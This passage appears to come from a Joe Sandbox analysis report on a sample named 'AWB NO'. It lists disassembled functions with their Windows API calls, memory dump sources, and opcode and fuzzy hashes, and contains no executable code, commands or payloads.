                                                              • GetStartupInfoW.KERNEL32(?,004BBF10,00000064,00427F27,004BBD38,00000014), ref: 0042D8A5
                                                              • GetFileType.KERNEL32(00000001), ref: 0042D939
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CriticalEnterFileInfoSectionStartupType
                                                              • String ID:
                                                              • API String ID: 4158522439-0
                                                              • Opcode ID: d75f85286d7149e3df4aeb7f378c196ee2d2b9e943816e1b1316b01707c285a0
                                                              • Instruction ID: aee4ad3ffb5005602a5dfeae2f0400f1dff4bb22320f4fe1b7703a6e62d7fd16
                                                              • Opcode Fuzzy Hash: d75f85286d7149e3df4aeb7f378c196ee2d2b9e943816e1b1316b01707c285a0
                                                              • Instruction Fuzzy Hash: F881ECB1E052658FCB10CF65E8419AEBBF0AF46314B64426FE4A5E73D1D7389843CB58
                                                              Function 00456DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Variant$AllocClearCopyInitString
                                                              • String ID:
                                                              • API String ID: 2808897238-0
                                                              • Opcode ID: e546aba2cf6def54e7357e65f076d5851a07759410ce3ee75a886eed7ec4ed7a
                                                              • Instruction ID: 493451d42fa2cf72034c46684ab61465e33aa78788b401b925ba93198380c5c1
                                                              • Opcode Fuzzy Hash: e546aba2cf6def54e7357e65f076d5851a07759410ce3ee75a886eed7ec4ed7a
                                                              • Instruction Fuzzy Hash: EB510D316047019BDB209F66E881A2EB3E59F48715F60883FED46C72D3DB789849DB0D
                                                              Function 00489A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowRect.USER32(0106F260,?), ref: 00489AD2
                                                              • ScreenToClient.USER32(00000002,00000002), ref: 00489B05
                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00489B72
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientMoveRectScreen
                                                              • String ID:
                                                              • API String ID: 3880355969-0
                                                              • Opcode ID: eab6e7512a8478ae3c31ffb502bec9390e6d77077a36ac5797bb03ab36ff8834
                                                              • Instruction ID: 83a32f27effb1c0e9225a5450d6387a379812c061b1dd1f9dd249746571fe159
                                                              • Opcode Fuzzy Hash: eab6e7512a8478ae3c31ffb502bec9390e6d77077a36ac5797bb03ab36ff8834
                                                              • Instruction Fuzzy Hash: C1512D74A00649AFCF14EF58D8809BE7BB5FF44324F188A6AF8159B390D734AD41CB98
                                                              Function 00476CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00476CE4
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476CF4
                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476D58
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476D64
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$socket
                                                              • String ID:
                                                              • API String ID: 1881357543-0
                                                              • Opcode ID: 77c53143c729ce36dc974e975d61c692b37078a4b9ea42646d2398b64f5d5f68
                                                              • Instruction ID: 99aa5b465f9238f2aeb89e099bfb182e161439948bd7605c7e61f4c801cf907b
                                                              • Opcode Fuzzy Hash: 77c53143c729ce36dc974e975d61c692b37078a4b9ea42646d2398b64f5d5f68
                                                              • Instruction Fuzzy Hash: C941B8747406006FEB20AF25DC86F7A77E59B44B14F44842EFA59AB3D3DB789C008B99
                                                              Function 0046BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0046BB09
                                                              • GetLastError.KERNEL32(?,00000000), ref: 0046BB2F
                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0046BB54
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0046BB80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                              • String ID:
                                                              • API String ID: 3321077145-0
                                                              • Opcode ID: 7d4c3f819cdbef438a43595e79e481deff2ae3b7a43f21d398b0a19bb563e8ae
                                                              • Instruction ID: 49076c1f2e021a37f8aa73fa151b50ed520da2b4e34a445023821da6fd8ec2a5
                                                              • Opcode Fuzzy Hash: 7d4c3f819cdbef438a43595e79e481deff2ae3b7a43f21d398b0a19bb563e8ae
                                                              • Instruction Fuzzy Hash: B7412F39600510DFCB10EF59C58495DBBE1EF49314B05849EEC4AAB7A2DB38FD41CB95
                                                              Function 00488AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00488B4D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: 6699b31c520405ad2b4610510c1f9538b8245166342defbf1afa73a81b7e239f
                                                              • Instruction ID: 6017366305c22272e93e48bc594278956003a9b2b994b7244c35f7a79524baaf
                                                              • Opcode Fuzzy Hash: 6699b31c520405ad2b4610510c1f9538b8245166342defbf1afa73a81b7e239f
                                                              • Instruction Fuzzy Hash: F1319074640204BEEB24BA58CC45FAE3764EB85310FA44D2BFA51D62A1DF38B9409B59
                                                              Function 0048ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ClientToScreen.USER32(?,?), ref: 0048AE1A
                                                              • GetWindowRect.USER32(?,?), ref: 0048AE90
                                                              • PtInRect.USER32(?,?,0048C304), ref: 0048AEA0
                                                              • MessageBeep.USER32(00000000), ref: 0048AF11
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                              • String ID:
                                                              • API String ID: 1352109105-0
                                                              • Opcode ID: 6a18ba18eb21849e9a78bd79b6f84d7a3cce87d2be61423b7a6c01e025f158a7
                                                              • Instruction ID: 20aafe120d683b7536ec1c361d9cbfa3becb7b0e8fd9f7a68ee45a873ef900b5
                                                              • Opcode Fuzzy Hash: 6a18ba18eb21849e9a78bd79b6f84d7a3cce87d2be61423b7a6c01e025f158a7
                                                              • Instruction Fuzzy Hash: 72419A70A001099FEB11EF58C884A6D7BF1FF48340F1889BBEA049B351D7B4A812DF5A
                                                              Function 00460FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00461037
                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00461053
                                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 004610B9
                                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0046110B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                              • Instruction ID: 858596a3270a81407411c1b9f6ce7b0733e7ce38917833693a8278b9945e91ef
                                                              • Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                                                              • Instruction Fuzzy Hash: 33312C70E40688AEFF308A668C05BFBBBA9AB45310F0C421BE54152AF1E37D49C5975B
                                                              Function 00461121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetKeyboardState.USER32(?,75A7A2E0,?,00008000), ref: 00461176
                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00461192
                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 004611F1
                                                              • SendInput.USER32(00000001,?,0000001C,75A7A2E0,?,00008000), ref: 00461243
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                              • Instruction ID: 7fc8b11940ae94cab915bb0129d7889fd94765dd41f44bc06aee23e8cda00f34
                                                              • Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                                                              • Instruction Fuzzy Hash: 3031093094064C6EEF308A65C8157FF7BA9AB4A310F0C475FE580922E1E73C4955975B
                                                              Function 00485175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetForegroundWindow.USER32 ref: 00485189
                                                                • Part of subcall function 0046387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00463897
                                                                • Part of subcall function 0046387D: GetCurrentThreadId.KERNEL32 ref: 0046389E
                                                                • Part of subcall function 0046387D: AttachThreadInput.USER32(00000000,?,004652A7), ref: 004638A5
                                                              • GetCaretPos.USER32(?), ref: 0048519A
                                                              • ClientToScreen.USER32(00000000,?), ref: 004851D5
                                                              • GetForegroundWindow.USER32 ref: 004851DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                              • String ID:
                                                              • API String ID: 2759813231-0
                                                              • Opcode ID: 3c9b5327ebac13a768b74175cc57b937fb41fc61521e6e08e719a121656fbf4d
                                                              • Instruction ID: 9097aa05944612f658a49df0936e4ce841ce621ee0b45c22d7eaa76826a8875f
                                                              • Opcode Fuzzy Hash: 3c9b5327ebac13a768b74175cc57b937fb41fc61521e6e08e719a121656fbf4d
                                                              • Instruction Fuzzy Hash: 2D311071E00108AFDB04EFA6C8459EFB7F9EF98304F10447AE515E7242EA799E05CBA5
                                                              Function 0045B6AF Relevance: 6.1, APIs: 4, Instructions: 88windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 0045B6C7
                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B6E4
                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B71C
                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B742
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow
                                                              • String ID:
                                                              • API String ID: 2796087071-0
                                                              • Opcode ID: 96556b25c27b722fcd80e08a235ed5b8479bd3734fc4f5bb1adbaf26e45b4fce
                                                              • Instruction ID: 92905fa91f0919fd0663971f7b16c7770949424b3f2b88b14ccf821531dff383
                                                              • Opcode Fuzzy Hash: 96556b25c27b722fcd80e08a235ed5b8479bd3734fc4f5bb1adbaf26e45b4fce
                                                              • Instruction Fuzzy Hash: 22210731204244BAEB255B39AC49E7F7BA8DF49711F10403FFC05DA2A2EB69DC4593A9
                                                              Function 0048C788 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                              • GetCursorPos.USER32(?), ref: 0048C7C2
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043BBFB,?,?,?,?,?), ref: 0048C7D7
                                                              • GetCursorPos.USER32(?), ref: 0048C824
                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043BBFB,?,?,?), ref: 0048C85E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                              • String ID:
                                                              • API String ID: 2864067406-0
                                                              • Opcode ID: a85a76047272f662d32a6246e5787e1bd68dff5fdec9e985923bd53b80d21c5b
                                                              • Instruction ID: 757619bd3f98b372d46f3818d8faf94b3fa09ae1c323e5c89f059bb0ed552e39
                                                              • Opcode Fuzzy Hash: a85a76047272f662d32a6246e5787e1bd68dff5fdec9e985923bd53b80d21c5b
                                                              • Instruction Fuzzy Hash: 00318F35600018AFCB15EF58C898EEF7BB6EB49311F04486AF9058B2A1C7359950DB68
                                                              Function 00471A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00471A97
                                                                • Part of subcall function 00471B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00471B40
                                                                • Part of subcall function 00471B21: InternetCloseHandle.WININET(00000000), ref: 00471BDD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Internet$CloseConnectHandleOpen
                                                              • String ID:
                                                              • API String ID: 1463438336-0
                                                              • Opcode ID: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
                                                              • Instruction ID: 6bca59068395d17cc9b1d6ecd79d505e916fe66dc72e7fe7cd3c40e7ad3efc68
                                                              • Opcode Fuzzy Hash: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
                                                              • Instruction Fuzzy Hash: 1521C235200600BFEB119F648C01FFBB7ADFF44700F10842FF90996660E775A815A798
                                                              Function 0045E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0045F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0045E1C4,?,?,?,0045EFB7,00000000,000000EF,00000119,?,?), ref: 0045F5BC
                                                                • Part of subcall function 0045F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 0045F5E2
                                                                • Part of subcall function 0045F5AD: lstrcmpiW.KERNEL32(00000000,?,0045E1C4,?,?,?,0045EFB7,00000000,000000EF,00000119,?,?), ref: 0045F613
                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0045EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0045E1DD
                                                              • lstrcpyW.KERNEL32(00000000,?), ref: 0045E203
                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,0045EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 0045E237
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: lstrcmpilstrcpylstrlen
                                                              • String ID: cdecl
                                                              • API String ID: 4031866154-3896280584
                                                              • Opcode ID: 20367ceda70578577b680d7018af8966699570bc105c6cdef83d59a45d3e2a0c
                                                              • Instruction ID: 22506efb5713b37d7609f33c51d8cac2a6d840cd6fd28f90ee3cef950c18954c
                                                              • Opcode Fuzzy Hash: 20367ceda70578577b680d7018af8966699570bc105c6cdef83d59a45d3e2a0c
                                                              • Instruction Fuzzy Hash: 6611E136200344EFCB28AF65D84997A37A8FF44310B40402BFC06CB265EB759959C7A8
                                                              Function 0043196E Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,?,?,00000000,?,?), ref: 004319A8
                                                              • SetFilePointerEx.KERNEL32(00000000,?,?,?,?,?,?), ref: 004319BC
                                                              • GetLastError.KERNEL32(?,?), ref: 004319C2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: FilePointer$ErrorLast
                                                              • String ID:
                                                              • API String ID: 142388799-0
                                                              • Opcode ID: 96d28b628717fee27030172df11d7059e9dd06cf487130628a0c7d1f37902b0f
                                                              • Instruction ID: cf36be1d7aadb081738f1464b8d7a77c62de840a1f157368b3abbfab92ff2e8b
                                                              • Opcode Fuzzy Hash: 96d28b628717fee27030172df11d7059e9dd06cf487130628a0c7d1f37902b0f
                                                              • Instruction Fuzzy Hash: 53113D72611229BFDB119BA8DC40FBE3778AF45724F50025BF520671E1DB78D800C769
                                                              Function 00459023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00459043
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00459055
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0045906B
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00459086
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                              • Instruction ID: ea11c295a1b5830ac64b7cd386b9bd11a908e5797feff80cff23e6c095b925d2
                                                              • Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                              • Instruction Fuzzy Hash: 84115E79900218FFDB10DFA5CC84E9EBBB4FB48710F2040A6EA04B7291D6716E55DB94
